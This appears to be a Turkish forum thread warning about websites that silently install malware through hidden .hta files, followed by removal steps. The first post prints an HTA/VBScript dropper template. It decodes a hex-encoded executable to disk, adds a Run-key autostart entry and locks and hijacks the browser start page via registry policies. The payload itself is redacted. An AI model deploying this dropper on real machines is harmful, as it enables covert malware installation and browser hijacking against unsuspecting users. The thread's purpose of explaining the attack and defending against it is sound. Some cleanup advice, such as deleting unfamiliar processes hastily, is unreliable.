!!! virus sacan siteler !!!

gecenlerde bir banner vasitasi ile rastladigim sitenin pesi pesine siteler acmasi ile karsilastigim ve ufak bir arastirma sonucunda tespit ettigim bir durumu sizlere anlatmak istiyorum.

soru : hicbir kutuya, uyariya v.b. evet dememenize ragmen bazi virus ve dialerlar makinenize nasil transfer olabiliyor ?

cevap : microsoftcu arkadaslarin windows sistemini calistirmak icin exploreri kullanmasi, dosya sisteminde dolasirken internette dolasmadiginizi, sabit diskte dolastiginizi explorer anlasin diye .htt ve .hta dosya formatlarini olusturdu. bu dosya formatlari explorerin makineniz icinde dolastiginiz zaman dosyalari bulmasini, göstermesini, dosya islemleri vb. isleri yapmasini sagliyor. bununla birlikte windowslarin tüm surumlerinde windows scripting host kurulu geliyor.

normal bir web sayfasina aktivx objesi halinde konulmus ve gosterilmesi engellenmis olan .hta uzantili dosya su kodu tasiyor :

<html><head>
<hta:application id=hta_note_id
applicationName=hta_note_name
showInTaskBar=no
caption=no
innerBorder=no
selection=no
scroll=no
contextmenu=no />
<script language=javascript>
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>
<SCRIPT language=vbs>
self.MoveTo 0, 0

prog = xxxxxxxxxxxxxxxxxxxxxxxxxxxx

path = "c:xxxxxxx.exe"
Set fso = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")
Set f = fso.CreateTextFile(path, True)
h0 = ""
i = 1
Do While i < Len(prog)
h0 = h0 & chr(cint("&h" & mid(prog, i, 2)))
i = i + 2
Loop
f.Write (h0)
f.Close
shell.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunwinupgrade","c:win32.hta"
shell.regwrite "HKLMSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage","00000001","REG_DWORD"
shell.regwrite "HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage","00000001","REG_DWORD"
shell.regwrite "HKCUSOFTWAREMicrosoftInternet ExplorerMainStart Page", "http://www.xxxx.net/","REG_SZ"
shell.regwrite "HKLMSOFTWAREMicrosoftInternet ExplorerMainStart Page", "http://www.xxxxxx.net/","REG_SZ"
self.Close
</SCRIPT>


yukarida prog = xxxxxx sekilde yazili olan satirda harddiske kopyalanacak olan prgramin hex hali tamami ile ayni satirda olacak sekilde yazili. boylece prg bir alt satirda baslayan dosya adi ile sabit diskinize yazilmis oluyor. ayrica scriptin registri ayarlariniza da eristigini soylemeye sanirim gerek yok.
(bu registry ayarlari acilis sayfanizi degistirir ve sizin tekrar degistirmemeniz icin explorer/internet secenekleri/baslangic sayfasi kismindaki butonlari deaktif hale getirir.
eger bu duruma dustuyseniz adi gecen anahtari registriden silerek kurtulabilirsiniz.)

prgramin bir aktivx objesi gibi yuklenmesi ve scripti tasiyan sayfanin .hta uzantili olmasi sizin uyarilmanizi engelliyor (microsoft updateler de ayni mantik ile calismakta)

bu ve bunun gibi durumlardan korunmanin tek yolu internet guvenligi kismindan aktivx ile ilgili olanlari bana sor diye isaretlemektir. (tum flash sayfalarinda yada icinde flash olan sayfalarda da uyari alirsiniz.)

en büyük virus microsoft işte.

sende uğraş makinayı korumak için. adam explorer ile hiçbirşeye evet demeden yüklüyor virusu.

mesut şu konuyu biraz daha açarmısın... bu arada benim de giriş sayfam bi keresinde değişmişti... hem de saçma sapan bi site çıkıyordu açılış sayfasında ve resmen makineyi formatlamak zorunda kalmıştım... böyle bi durumda tam olarak ne yapılması gerektiğini biraz daha açar mısın... şimdiden teşekkürler...

bu veya bunun gibi bir durumda yapilacaklar cok basit :

1. Makinenize transfer olan programi bulacaksiniz
olasi ihtimaller c: , c:windows, c:windowssystem veya c:windowssystem32

2. Programin nasil baslatildigini bulacaksiniz
bu program bu klasörlerin hangisinde olursa olsun veya baska bir klasore yazilmista olsa calisabilmesinin tek yolu var. Bilgisayariniz acildiginda baslatilmasi gerekiyor.

Bilgisayar acildiginda baslama yontemleri ise:
1. Autoexec.bat
2. win ini
3. Baslat / programlar / Baslangic menusu
4. Registry run anahtari
5. Registry policies anahtarlari
6. Registry runonece anahtari
7. Registry services anahtari (Xp veya Nt ve ustu)

3. Program yuksek ihtimalle bilgisayariniza iner inmez calistigi icin silmeniz, hatta bulmaniz imkansizdir. cozumu ise Ctrl+Alt+Del [BC] ile gorev yoneticisini acin.
islemler tabinda size yabanci gelen bir isim arayin (dialer, ata, fistik, v.b. exe) yuzde 95 program odur. ismini unutmadan gorevi sonlandirin.

4. programi bulma : baslat bul dosya adi kismina gorev yoneticisinden aldiginiz ismi yapistirip aratin. bulunca dusunmeden silin (eger sildiginiz sey bir sistem servisi ise bilgisayar cokebilir. emin degilseniz silmeyin)

5. programin yeniden yazilmasini ve calistirilmasini engelleme
baslat/calistir kutusuna regedit yazin entere basin (su andan itibaren yapacaginiz en ufak bir hata ile windows sonsuzlugun derin sularina gomulebilir. dikkatli olun) Hatkey kurrent yuser / softveyr / mikrosoft / vindovs / kurrent versiyon / run anahtarini bulun ve ordan adi gecen exeyi silin.
orda bulamassaniz diyer hatkey lere de ayni yere bakin.

6. eger baslangic sayfaniz bi porno sitesi oldu ve silemiyorsaniz su anahtar degerlerini regedit ile bulun ve silin:
"HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunwinupgrade","c:win32.hta"
"HKLMSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage","00000001","REG_DWORD"
"HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage","00000001","REG_DWORD"
"HKCUSOFTWAREMicrosoftInternet ExplorerMainStart Page", "http://www.xxxx.net/","REG_SZ"
"HKLMSOFTWAREMicrosoftInternet ExplorerMainStart Page", "http://www.xxxxxx.net/","REG_SZ"

eger anlayamadiysaniz kisaltmalar soyle:
HKLM = hotkey local machine
HKCU = hotkey current user
demektir. zaten registry acinca anlarsiniz.

Bu bilgi tamamen egitim amacli olup bilgisayiriniza yapacaginiz islemler kendi riskinizi tasimaktadir. Olasi sistem hatalari, bilgi kaybi veya maddi hasarlardan beni sorumlu tumassiniz, sorumluluk tamamen kendinize aittir. (Sizin mağsunuzu ben tutmuyorum, kendiniz kullaniyorsunuz)

sevgiyle kalin....[BC]